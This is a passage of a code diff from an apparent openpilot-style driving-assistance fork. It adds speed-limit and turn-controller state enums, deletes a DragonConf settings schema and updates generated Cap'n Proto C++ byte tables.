+ turn @5; + limit @6; + turnlimit @7; + } + + enum SpeedLimitControlState { + inactive @0; # No speed limit set or not enabled by parameter. + tempInactive @1; # User wants to ignore speed limit until it changes. + adapting @2; # Reducing speed to match new speed limit. + active @3; # Cruising at speed limit. + } + + enum VisionTurnControllerState { + disabled @0; # No predicted substancial turn on vision range or feature disabled. + entering @1; # A subsantial turn is predicted ahead, adapting speed to turn confort levels. + turning @2; # Actively turning. Managing acceleration to provide a roll on turn feeling. + leaving @3; # Road ahead straightens. Start to allow positive acceleration. + } } -struct CustomReserved2 @0xf35cc4560bbf6ec2 { +struct LateralPlanExt @0xf35cc4560bbf6ec2 { + dPathWLinesX @0 :List(Float32); + dPathWLinesY @1 :List(Float32); } struct CustomReserved3 @0xda96579883444c35 { diff --git a/cereal/dp.capnp b/cereal/dp.capnp deleted file mode 100644 index edbdb7b24..000000000 --- a/cereal/dp.capnp +++ /dev/null @@ -1,58 +0,0 @@ -using Cxx = import "./include/c++.capnp"; -$Cxx.namespace("cereal"); - -@0xbfa7e645486440c7; - -# dp -struct DragonConf { - dpAtl @0 :UInt8; - dpLocale @1 :Text; - dpLateralMode @2 :UInt8; - dpLcMinMph @3 :UInt8; - dpLcAutoMinMph @4 :UInt8; - dpLcAutoDelay @5 :Float32; - dpLateralLanelines @6 :Bool; - dpLateralCameraOffset @7 :Int8; - dpLateralPathOffset @8 :Int8; - dpLateralRoadEdgeDetected @9 :Bool; - dpIpAddr @10 :Text; - dpUiTop @11 :Bool; - dpUiSide @12 :Bool; - dpUiBrightness @13 :UInt8; - dpUiDisplayMode @14 :UInt8; - dpUiSpeed @15 :Bool; - dpUiEvent @16 :Bool; - dpUiFace @17 :Bool; - dpUiLeadInfo @18 :Bool; - dpUiLaneline @19 :Bool; - dpUiChevron @20 :Bool; - dpUiDmCam @21 :Bool; - dpUiRainbow @22 :Bool; - dpToyotaSng @23 :Bool; - dpAccelProfileCtrl @24 :Bool; - dpAccelProfile @25 :UInt8; - dpToyotaCruiseOverride @26 :Bool; - dpToyotaCruiseOverrideSpeed @27 :UInt8; - dpToyotaAutoLock @28 :Bool; - dpToyotaAutoUnlock @29 :Bool; - dpToyotaDebugBsm @30 :Bool; - dpMapd @31 :Bool; - dpLocalDb @32 :Bool; - dpDashcamd @33 :Bool; - dpMazdaSteerAlert @34 :Bool; - dpSpeedCheck @35 :Bool; - dpFollowingProfileCtrl @36 :Bool; - dpFollowingProfile @37 :UInt8; - dpLateralAlt @38 :Bool; - dpLateralAltSpeed @39 :UInt8; - dpLateralAltCtrl @40 :UInt8; - dpLateralAltLanelines @41 :Bool; - dpLateralAltCameraOffset @42 :Int8; - dpLateralAltPathOffset @43 :Int8; - dpE2EConditional @44 :Bool; - dpE2EConditionalAdaptFp @45 :Bool; - dpE2EConditionalAdaptAp @46 :Bool; - dpE2EConditionalVoacc @47 :Bool; - dpLongLeadMovingAlert @48 :Int8; - dpLateralLcManual @49 :Bool; -} diff --git a/cereal/gen/cpp/car.capnp.c++ b/cereal/gen/cpp/car.capnp.c++ index 7f5b877ff..8167ce58a 100644 --- a/cereal/gen/cpp/car.capnp.c++ +++ b/cereal/gen/cpp/car.capnp.c++ @@ -214,7 +214,7 @@ const ::capnp::_::RawSchema s_9b1657f34caf3ad3 = { 1, 11, i_9b1657f34caf3ad3, nullptr, nullptr, { &s_9b1657f34caf3ad3, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<719> b_baa8c5d505f727de = { +static const ::capnp::_::AlignedData<688> b_baa8c5d505f727de = { { 0, 0, 0, 0, 5, 0, 6, 0, 222, 39, 247, 5, 213, 197, 168, 186, 19, 0, 0, 0, 2, 0, 0, 0, @@ -224,7 +224,7 @@ static const ::capnp::_::AlignedData<719> b_baa8c5d505f727de = { 21, 0, 0, 0, 234, 0, 0, 0, 33, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 29, 0, 0, 0, 143, 11, 0, 0, + 29, 0, 0, 0, 23, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 99, 97, 114, 46, 99, 97, 112, 110, @@ -232,375 +232,360 @@ static const ::capnp::_::AlignedData<719> b_baa8c5d505f727de = { 110, 116, 46, 69, 118, 101, 110, 116, 78, 97, 109, 101, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, - 236, 1, 0, 0, 1, 0, 2, 0, + 216, 1, 0, 0, 1, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 189, 5, 0, 0, 74, 0, 0, 0, + 129, 5, 0, 0, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, - 185, 5, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 122, 0, 0, 0, 0, 0, 0, 0, - 185, 5, 0, 0, 218, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 103, 0, 0, 0, 0, 0, 0, 0, - 189, 5, 0, 0, 202, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 193, 5, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 3, 0, 0, 0, 0, 0, 0, 0, - 189, 5, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 4, 0, 0, 0, 0, 0, 0, 0, - 185, 5, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 5, 0, 0, 0, 0, 0, 0, 0, - 185, 5, 0, 0, 98, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 181, 5, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 7, 0, 0, 0, 0, 0, 0, 0, - 177, 5, 0, 0, 170, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 8, 0, 0, 0, 0, 0, 0, 0, - 177, 5, 0, 0, 98, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 9, 0, 0, 0, 0, 0, 0, 0, - 173, 5, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 169, 5, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 11, 0, 0, 0, 0, 0, 0, 0, - 165, 5, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 15, 0, 0, 0, 0, 0, 0, 0, - 161, 5, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 99, 0, 0, 0, 0, 0, 0, 0, - 157, 5, 0, 0, 194, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 104, 0, 0, 0, 0, 0, 0, 0, - 157, 5, 0, 0, 170, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 157, 5, 0, 0, 98, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 17, 0, 0, 0, 0, 0, 0, 0, - 153, 5, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 18, 0, 0, 0, 0, 0, 0, 0, - 149, 5, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 19, 0, 0, 0, 0, 0, 0, 0, - 145, 5, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 20, 0, 0, 0, 0, 0, 0, 0, - 145, 5, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 22, 0, 0, 0, 0, 0, 0, 0, - 145, 5, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 23, 0, 0, 0, 0, 0, 0, 0, - 145, 5, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 24, 0, 0, 0, 0, 0, 0, 0, - 141, 5, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 121, 0, 0, 0, 0, 0, 0, 0, - 137, 5, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 25, 0, 0, 0, 0, 0, 0, 0, - 137, 5, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 105, 0, 0, 0, 0, 0, 0, 0, - 133, 5, 0, 0, 202, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 26, 0, 0, 0, 0, 0, 0, 0, - 137, 5, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 27, 0, 0, 0, 0, 0, 0, 0, - 133, 5, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 28, 0, 0, 0, 0, 0, 0, 0, - 129, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 29, 0, 0, 0, 0, 0, 0, 0, - 125, 5, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 30, 0, 0, 0, 0, 0, 0, 0, - 121, 5, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 106, 0, 0, 0, 0, 0, 0, 0, - 117, 5, 0, 0, 186, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 31, 0, 0, 0, 0, 0, 0, 0, - 117, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 32, 0, 0, 0, 0, 0, 0, 0, - 113, 5, 0, 0, 218, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 33, 0, 0, 0, 0, 0, 0, 0, - 117, 5, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 34, 0, 0, 0, 0, 0, 0, 0, - 113, 5, 0, 0, 162, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 35, 0, 0, 0, 0, 0, 0, 0, - 113, 5, 0, 0, 186, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 36, 0, 0, 0, 0, 0, 0, 0, - 113, 5, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 107, 0, 0, 0, 0, 0, 0, 0, - 113, 5, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 0, 0, 0, 0, 0, 0, 0, - 113, 5, 0, 0, 210, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 109, 0, 0, 0, 0, 0, 0, 0, - 117, 5, 0, 0, 218, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 37, 0, 0, 0, 0, 0, 0, 0, - 121, 5, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 38, 0, 0, 0, 0, 0, 0, 0, - 121, 5, 0, 0, 202, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 39, 0, 0, 0, 0, 0, 0, 0, - 125, 5, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 40, 0, 0, 0, 0, 0, 0, 0, - 125, 5, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 110, 0, 0, 0, 0, 0, 0, 0, - 121, 5, 0, 0, 242, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 41, 0, 0, 0, 0, 0, 0, 0, - 125, 5, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 111, 0, 0, 0, 0, 0, 0, 0, - 121, 5, 0, 0, 242, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 42, 0, 0, 0, 0, 0, 0, 0, - 125, 5, 0, 0, 162, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 43, 0, 0, 0, 0, 0, 0, 0, - 125, 5, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 44, 0, 0, 0, 0, 0, 0, 0, - 121, 5, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 45, 0, 0, 0, 0, 0, 0, 0, - 121, 5, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 47, 0, 0, 0, 0, 0, 0, 0, - 117, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 48, 0, 0, 0, 0, 0, 0, 0, - 113, 5, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 49, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 50, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 51, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 52, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 112, 0, 0, 0, 0, 0, 0, 0, - 105, 5, 0, 0, 250, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 113, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 42, 1, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 0, 0, 0, 0, 0, 0, 0, - 117, 5, 0, 0, 42, 1, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 53, 0, 0, 0, 0, 0, 0, 0, - 125, 5, 0, 0, 82, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 54, 0, 0, 0, 0, 0, 0, 0, - 121, 5, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 55, 0, 0, 0, 0, 0, 0, 0, - 117, 5, 0, 0, 34, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 56, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 101, 0, 0, 0, 0, 0, 0, 0, - 105, 5, 0, 0, 202, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 102, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 242, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 57, 0, 0, 0, 0, 0, 0, 0, - 113, 5, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 58, 0, 0, 0, 0, 0, 0, 0, - 113, 5, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 59, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 60, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 12, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 162, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 61, 0, 0, 0, 0, 0, 0, 0, - 109, 5, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 62, 0, 0, 0, 0, 0, 0, 0, - 105, 5, 0, 0, 66, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 63, 0, 0, 0, 0, 0, 0, 0, - 97, 5, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 64, 0, 0, 0, 0, 0, 0, 0, - 93, 5, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 65, 0, 0, 0, 0, 0, 0, 0, - 93, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 67, 0, 0, 0, 0, 0, 0, 0, - 89, 5, 0, 0, 34, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 68, 0, 0, 0, 0, 0, 0, 0, - 81, 5, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 114, 0, 0, 0, 0, 0, 0, 0, - 77, 5, 0, 0, 2, 1, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 119, 0, 0, 0, 0, 0, 0, 0, - 81, 5, 0, 0, 202, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 115, 0, 0, 0, 0, 0, 0, 0, - 85, 5, 0, 0, 218, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 69, 0, 0, 0, 0, 0, 0, 0, - 89, 5, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 70, 0, 0, 0, 0, 0, 0, 0, - 89, 5, 0, 0, 50, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 0, 0, 0, 0, 0, 0, 0, - 81, 5, 0, 0, 234, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 71, 0, 0, 0, 0, 0, 0, 0, - 85, 5, 0, 0, 130, 0, 0, 0, + 125, 5, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 117, 0, 0, 0, 0, 0, 0, 0, - 81, 5, 0, 0, 234, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 72, 0, 0, 0, 0, 0, 0, 0, - 85, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 73, 0, 0, 0, 0, 0, 0, 0, - 81, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 74, 0, 0, 0, 0, 0, 0, 0, - 77, 5, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 75, 0, 0, 0, 0, 0, 0, 0, - 73, 5, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 118, 0, 0, 0, 0, 0, 0, 0, - 73, 5, 0, 0, 210, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 77, 0, 0, 0, 0, 0, 0, 0, - 77, 5, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 78, 0, 0, 0, 0, 0, 0, 0, - 73, 5, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 79, 0, 0, 0, 0, 0, 0, 0, - 73, 5, 0, 0, 98, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 120, 0, 0, 0, 0, 0, 0, 0, - 69, 5, 0, 0, 18, 1, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 80, 0, 0, 0, 0, 0, 0, 0, - 77, 5, 0, 0, 170, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 81, 0, 0, 0, 0, 0, 0, 0, - 77, 5, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 82, 0, 0, 0, 0, 0, 0, 0, - 73, 5, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 83, 0, 0, 0, 0, 0, 0, 0, - 69, 5, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 84, 0, 0, 0, 0, 0, 0, 0, - 69, 5, 0, 0, 162, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 85, 0, 0, 0, 0, 0, 0, 0, - 69, 5, 0, 0, 170, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 66, 0, 0, 0, 0, 0, 0, 0, - 69, 5, 0, 0, 98, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 86, 0, 0, 0, 0, 0, 0, 0, - 65, 5, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 87, 0, 0, 0, 0, 0, 0, 0, - 61, 5, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 88, 0, 0, 0, 0, 0, 0, 0, - 57, 5, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 13, 0, 0, 0, 0, 0, 0, 0, - 53, 5, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 46, 0, 0, 0, 0, 0, 0, 0, - 53, 5, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 76, 0, 0, 0, 0, 0, 0, 0, - 53, 5, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 89, 0, 0, 0, 0, 0, 0, 0, - 49, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 90, 0, 0, 0, 0, 0, 0, 0, - 45, 5, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 91, 0, 0, 0, 0, 0, 0, 0, - 45, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, - 41, 5, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 92, 0, 0, 0, 0, 0, 0, 0, - 37, 5, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 93, 0, 0, 0, 0, 0, 0, 0, - 33, 5, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 21, 0, 0, 0, 0, 0, 0, 0, - 33, 5, 0, 0, 202, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 94, 0, 0, 0, 0, 0, 0, 0, - 37, 5, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 95, 0, 0, 0, 0, 0, 0, 0, - 37, 5, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 96, 0, 0, 0, 0, 0, 0, 0, - 37, 5, 0, 0, 178, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 97, 0, 0, 0, 0, 0, 0, 0, - 37, 5, 0, 0, 130, 0, 0, 0, + 125, 5, 0, 0, 218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, - 33, 5, 0, 0, 10, 1, 0, 0, + 129, 5, 0, 0, 202, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 2, 0, 0, 0, 0, 0, 0, 0, + 133, 5, 0, 0, 82, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 3, 0, 0, 0, 0, 0, 0, 0, + 129, 5, 0, 0, 74, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 4, 0, 0, 0, 0, 0, 0, 0, + 125, 5, 0, 0, 154, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 5, 0, 0, 0, 0, 0, 0, 0, + 125, 5, 0, 0, 98, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 6, 0, 0, 0, 0, 0, 0, 0, + 121, 5, 0, 0, 106, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 7, 0, 0, 0, 0, 0, 0, 0, + 117, 5, 0, 0, 170, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 8, 0, 0, 0, 0, 0, 0, 0, + 117, 5, 0, 0, 98, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 9, 0, 0, 0, 0, 0, 0, 0, + 113, 5, 0, 0, 106, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 109, 5, 0, 0, 106, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 11, 0, 0, 0, 0, 0, 0, 0, + 105, 5, 0, 0, 106, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 15, 0, 0, 0, 0, 0, 0, 0, + 101, 5, 0, 0, 122, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 94, 0, 0, 0, 0, 0, 0, 0, + 97, 5, 0, 0, 194, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 99, 0, 0, 0, 0, 0, 0, 0, + 97, 5, 0, 0, 170, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 16, 0, 0, 0, 0, 0, 0, 0, + 97, 5, 0, 0, 98, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 17, 0, 0, 0, 0, 0, 0, 0, + 93, 5, 0, 0, 90, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 18, 0, 0, 0, 0, 0, 0, 0, + 89, 5, 0, 0, 74, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 19, 0, 0, 0, 0, 0, 0, 0, + 85, 5, 0, 0, 178, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 20, 0, 0, 0, 0, 0, 0, 0, + 85, 5, 0, 0, 154, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 22, 0, 0, 0, 0, 0, 0, 0, + 85, 5, 0, 0, 138, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 23, 0, 0, 0, 0, 0, 0, 0, + 85, 5, 0, 0, 82, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 24, 0, 0, 0, 0, 0, 0, 0, + 81, 5, 0, 0, 90, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 0, 0, 0, 0, 0, 0, 0, + 77, 5, 0, 0, 154, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 25, 0, 0, 0, 0, 0, 0, 0, + 77, 5, 0, 0, 90, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 100, 0, 0, 0, 0, 0, 0, 0, + 73, 5, 0, 0, 202, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 26, 0, 0, 0, 0, 0, 0, 0, + 77, 5, 0, 0, 82, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 27, 0, 0, 0, 0, 0, 0, 0, + 73, 5, 0, 0, 82, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 28, 0, 0, 0, 0, 0, 0, 0, + 69, 5, 0, 0, 114, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 29, 0, 0, 0, 0, 0, 0, 0, + 65, 5, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 30, 0, 0, 0, 0, 0, 0, 0, + 61, 5, 0, 0, 106, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 101, 0, 0, 0, 0, 0, 0, 0, + 57, 5, 0, 0, 186, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 31, 0, 0, 0, 0, 0, 0, 0, + 57, 5, 0, 0, 114, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 32, 0, 0, 0, 0, 0, 0, 0, + 53, 5, 0, 0, 218, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 33, 0, 0, 0, 0, 0, 0, 0, + 57, 5, 0, 0, 122, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 34, 0, 0, 0, 0, 0, 0, 0, + 53, 5, 0, 0, 162, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 35, 0, 0, 0, 0, 0, 0, 0, + 53, 5, 0, 0, 186, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 36, 0, 0, 0, 0, 0, 0, 0, + 53, 5, 0, 0, 138, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 102, 0, 0, 0, 0, 0, 0, 0, + 53, 5, 0, 0, 154, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 103, 0, 0, 0, 0, 0, 0, 0, + 53, 5, 0, 0, 210, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 104, 0, 0, 0, 0, 0, 0, 0, + 57, 5, 0, 0, 218, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 37, 0, 0, 0, 0, 0, 0, 0, + 61, 5, 0, 0, 178, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 38, 0, 0, 0, 0, 0, 0, 0, + 61, 5, 0, 0, 202, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 39, 0, 0, 0, 0, 0, 0, 0, + 65, 5, 0, 0, 154, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 40, 0, 0, 0, 0, 0, 0, 0, + 65, 5, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 105, 0, 0, 0, 0, 0, 0, 0, + 61, 5, 0, 0, 242, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 41, 0, 0, 0, 0, 0, 0, 0, + 65, 5, 0, 0, 90, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 106, 0, 0, 0, 